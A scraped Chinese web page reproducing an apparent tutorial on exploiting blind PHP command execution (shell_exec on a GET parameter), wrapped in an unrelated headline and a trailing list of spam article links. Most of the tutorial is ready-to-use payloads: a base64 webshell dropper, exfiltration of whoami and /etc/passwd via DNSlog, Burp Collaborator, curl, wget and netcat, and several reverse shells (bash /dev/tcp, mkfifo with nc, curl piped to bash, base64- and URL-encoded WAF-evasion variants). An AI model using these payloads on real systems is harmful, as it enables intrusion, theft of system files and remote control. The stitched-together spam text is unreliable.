当前位置: 首页 > news >正文

公司网站的意义营销型网站开发公司电话

公司网站的意义,营销型网站开发公司电话,珠海酒店网站建设,西安网页搭建目录 漏洞代码 突破方式 重定向 dnslog外部通信 burpsuite burpcollaborator外部通信 日志监听 netcat监听 反弹shell的各种姿势 漏洞代码 ?php shell_exec($_GET[a]); ?这里使用了无回显的shell执行函数shell_exec#xff0c;给html目录的权限是777 突破方…目录 漏洞代码 突破方式 重定向 dnslog外部通信 burpsuite burpcollaborator外部通信 日志监听 netcat监听 反弹shell的各种姿势 漏洞代码 ?php shell_exec($_GET[a]); ?这里使用了无回显的shell执行函数shell_exec给html目录的权限是777 突破方式 重定向 将需要获取的内容重定向到新文件里面 eval.php?acat%20/etc/passwd%20info.txt 然后访问info.txt 或者重定向一个新的webshell到该目录下 echo PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg|base64 -d shell.php //?php phpinfo();eval($_POST[cmd])? 访问新的webshell即可 dnslog外部通信 eval.php?aping whami.tfkfae.dnslog.cn burpsuite burpcollaborator外部通信 原理同dnslog貌似比dnslog更加灵敏 ?aping%20whoami.9lvy3js5qy3eg6b4cmtyzypl2c82wr.burpcollaborator.net 日志监听 用 curl 协议访问远程服务器 ip 的 80 端口再到 kali 的终端查看记录即可 用一台kali监听日志 python3 -m http.server 80 执行命令 /eval.php?acurl%20192.168.10.133/?whoami /eval.php?awget%20192.168.10.133/?whoami 查看日志 /eval.php?acurl%20192.168.10.133/?cat%20/etc/passwd netcat监听 nc -lvp 8888 nc -lp 8888./content ?anc%20192.168.10.133%208888%20%20/etc/passwd 查看content.txt内容 反弹shell的各种姿势 bash反弹 nc -vlnp 8080 bash -i /dev/tcp/192.168.10.128/8080 01 这里在www网页里面反弹失败我们在服务器终端可以反弹 使用指定的bash shell反弹 /bin/bash -c bash -i /dev/tcp/192.168.10.128/8080 01 这里需要进行URL编码 %2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%2f%38%30%38%30%20%30%3e%26%31%27 此时成功在web网页反弹shell curl反弹shell攻击者启动http服务并在站点目录下存放一个文件里面写着bash反弹shell命令 ?acurl%20http://192.168.10.128/bashshell|bash 成功反弹到shell 临时文件反弹shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.10.128 8080 /tmp/f URL编码 %72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%20%38%30%38%30%20%3e%2f%74%6d%70%2f%66 这里同样只在终端反弹成功在web端口反弹失败 base64编码 L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc /bin/bash -c bash -i /dev/tcp/192.168.10.128/8080 01 echo L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc |base64 -d |bash URL编码 %65%63%68%6f%20%22%4c%32%4a%70%62%69%39%69%59%58%4e%6f%49%43%31%6a%49%43%64%69%59%58%4e%6f%49%43%31%70%49%44%34%6d%49%43%39%6b%5a%58%59%76%64%47%4e%77%4c%7a%45%35%4d%69%34%78%4e%6a%67%75%4d%54%41%75%4d%54%49%34%4c%7a%67%77%4f%44%41%67%4d%44%34%6d%4d%53%63%3d%22%20%7c%62%61%73%65%36%34%20%2d%64%20%7c%62%61%73%68 这里也成功在web端口反弹到shell可以绕过部分waf
http://www.w-s-a.com/news/864548/

相关文章:

  • 网站设计的含义只做恐怖片的网站
  • 网站改版方案ppt室内装修公司简介
  • 做色网站wordpress twenty ten
  • 马鞍山建设工程监督站建管处网站免费的海报模板网站
  • 类似百度的网站移动端的网站怎么做的
  • 网站开发需要什么文凭网站分析的优劣势
  • 海尔网站建设不足之处山东网站营销
  • 楚雄 网站建设广告设计一般人能学吗
  • 热搜榜排名前十山东seo多少钱
  • 衡水哪有建网站的吗企业信息系统英文
  • 有模板怎么建站wordpress媒体库图片路径
  • 怎么做网站h汉狮企业网站营销的实现方式
  • 新津县建设局网站怎么做区块链网站
  • 网站设计与制作是什么专业广州优化网站
  • 腾讯有做淘宝客网站吗网站开发包
  • 网站整体营销方案网站建设百度贴吧
  • 宣传式网站养生网站模板
  • 临猗网站建设天津做网站哪家服务好
  • 郑州做网站九零后用织梦建设网站的步骤
  • 莱芜网站优化加徽信xiala5江都网站制作
  • 网站开发工具书焦作网站开发公司电话
  • 石狮网站建设报价百度爱采购怎么优化排名
  • 广州网站开发系统如何建设百度网站
  • 免费建立一个个人网站网站流量图怎么做
  • 微信网站建设公司首选网站后台更新 前台不显示
  • 撰写网站专题活动策划方案未成年做网站
  • 免费在线响应式网站自助建站网页设计与网站建设试卷
  • 四川省肿瘤医院搜索优化整站优化
  • 新钥匙建站深圳创业补贴政策2023
  • 建网站需要准备什么网站三个月没排名